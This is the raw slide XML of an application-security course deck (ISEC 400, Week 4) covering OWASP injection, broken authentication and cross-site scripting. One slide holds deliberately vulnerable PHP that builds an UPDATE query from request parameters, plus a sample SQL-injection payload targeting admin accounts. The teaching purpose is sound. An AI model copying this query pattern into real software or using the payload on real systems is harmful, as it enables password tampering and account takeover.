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68" r:id="rId2"/>
    <p:sldId id="269" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="274" r:id="rId5"/>
    <p:sldId id="271" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="289" r:id="rId9"/>
    <p:sldId id="288" r:id="rId10"/>
    <p:sldId id="275" r:id="rId11"/>
    <p:sldId id="290" r:id="rId12"/>
    <p:sldId id="291" r:id="rId13"/>
    <p:sldId id="276" r:id="rId14"/>
    <p:sldId id="292" r:id="rId15"/>
    <p:sldId id="293" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="294" r:id="rId18"/>
    <p:sldId id="295" r:id="rId19"/>
    <p:sldId id="296" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="297" r:id="rId22"/>
    <p:sldId id="298" r:id="rId23"/>
    <p:sldId id="299" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="300" r:id="rId26"/>
    <p:sldId id="301" r:id="rId27"/>
    <p:sldId id="280" r:id="rId28"/>
    <p:sldId id="302" r:id="rId29"/>
    <p:sldId id="303" r:id="rId30"/>
    <p:sldId id="281" r:id="rId31"/>
    <p:sldId id="304" r:id="rId32"/>
    <p:sldId id="282" r:id="rId33"/>
    <p:sldId id="305" r:id="rId34"/>
    <p:sldId id="283" r:id="rId35"/>
    <p:sldId id="306" r:id="rId36"/>
    <p:sldId id="307" r:id="rId37"/>
    <p:sldId id="308" r:id="rId38"/>
    <p:sldId id="284" r:id="rId39"/>
    <p:sldId id="309" r:id="rId40"/>
    <p:sldId id="310" r:id="rId41"/>
    <p:sldId id="311" r:id="rId42"/>
    <p:sldId id="285" r:id="rId43"/>
    <p:sldId id="312" r:id="rId44"/>
    <p:sldId id="313" r:id="rId45"/>
    <p:sldId id="316" r:id="rId46"/>
    <p:sldId id="317" r:id="rId47"/>
    <p:sldId id="318" r:id="rId48"/>
    <p:sldId id="319" r:id="rId49"/>
    <p:sldId id="320" r:id="rId50"/>
    <p:sldId id="321" r:id="rId51"/>
    <p:sldId id="314" r:id="rId52"/>
    <p:sldId id="315" r:id="rId53"/>
    <p:sldId id="322" r:id="rId54"/>
    <p:sldId id="323" r:id="rId55"/>
    <p:sldId id="324" r:id="rId56"/>
    <p:sldId id="325" r:id="rId57"/>
    <p:sldId id="326" r:id="rId58"/>
    <p:sldId id="327" r:id="rId59"/>
    <p:sldId id="328" r:id="rId60"/>
    <p:sldId id="270" r:id="rId61"/>
    <p:sldId id="265"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200"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="E6E6E6"/>
    <a:srgbClr val="E0E0E0"/>
    <a:srgbClr val="133C5D"/>
    <a:srgbClr val="1310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E366F15-64CE-44F6-AF51-8F568C022106}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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A05D92-3DF3-46AE-AA3E-E4F00EDCEF5F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420398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60D343F-1CE6-4DBC-81D0-0B6C4F0D4CEA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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184147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CC9297-094B-4D43-A2BC-251F70F7FAC6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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1824789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516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5516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701244-2662-4920-9F2A-89027007E985}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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343030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FB9F28C-CA03-417A-BB11-4581E88297A7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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2184882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D63CE42-88DE-4DAE-BEE6-F990EFC56C39}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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3650202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6482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19200"/>
            <a:ext cx="4038600" cy="464820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98E561E9-EBCB-4F75-92F3-F2DCBCACB9FA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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2106423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19200"/>
            <a:ext cx="4040188"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28801"/>
            <a:ext cx="4040188" cy="4038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12192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828801"/>
            <a:ext cx="4041775" cy="4038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BF1A2E2A-7803-4D06-A8B8-49F1F33489B9}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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3216356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Date Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C82B316-30AA-4DF3-9FF0-A99B6D420566}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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2379596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9DDD29-E6DC-41B0-9328-87E0347E6B3D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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1779448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5943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313"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CDF90766-FF88-4569-AE43-2DC25C757AC3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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3634001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5000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0B15A12-29E9-4A8B-BF11-BE0A3FC00240}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013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3904736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79216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19200"/>
            <a:ext cx="8229600" cy="46482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AD201-9091-4BC7-8645-E6644BE2C723}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/9/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="632460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D7F6B3-FE9A-4A71-A476-BA18060D4072}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4198363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55.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.criticalwatch.com/assets/c-Owasp-to-Wasc-to-CWE-Mapping-Tech-Paper-0710131.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www.criticalwatch.com/assets/c-Owasp-to-Wasc-to-CWE-Mapping-Tech-Paper-0710131.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nvd.nist.gov/cvss.cfm?calculator"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nvd.nist.gov/cvss.cfm?calculator"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nvd.nist.gov/cvss.cfm?calculato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ISEC 400 Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Week 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Copyright © 2013 Todd Whittaker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>todd.whittaker@franklin.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402255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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data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10</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584294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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data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11</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5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1319456078"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2948055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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data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12</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5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2166989812"/>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
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4267200"/>
            <a:ext cx="8213436" cy="1064492"/>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>usertable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> SET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>' WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1676400"/>
            <a:ext cx="5715000" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42934"/>
              <a:gd name="adj2" fmla="val 9900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What if the sent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> like '%admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The same can happen with commands sent to the OS or queries sent to LDAP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69541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Broken auth. and session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities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13</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1369557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Broken auth. and session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities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14</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389389884"/>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Widespread</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF0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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6331799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Broken auth. and session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities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15</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669600880"/>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Widespread</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF0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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1676400"/>
            <a:ext cx="5029200" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 71849"/>
              <a:gd name="adj2" fmla="val 18505"/>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Common examples are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not hashing password in the DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using weak hashing in the DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposing session IDs on the URL instead of using cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sessions don’t time out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not using HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196254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scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites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16</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3750475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scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites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17</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3820996798"/>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Extreme</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>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3825384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scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
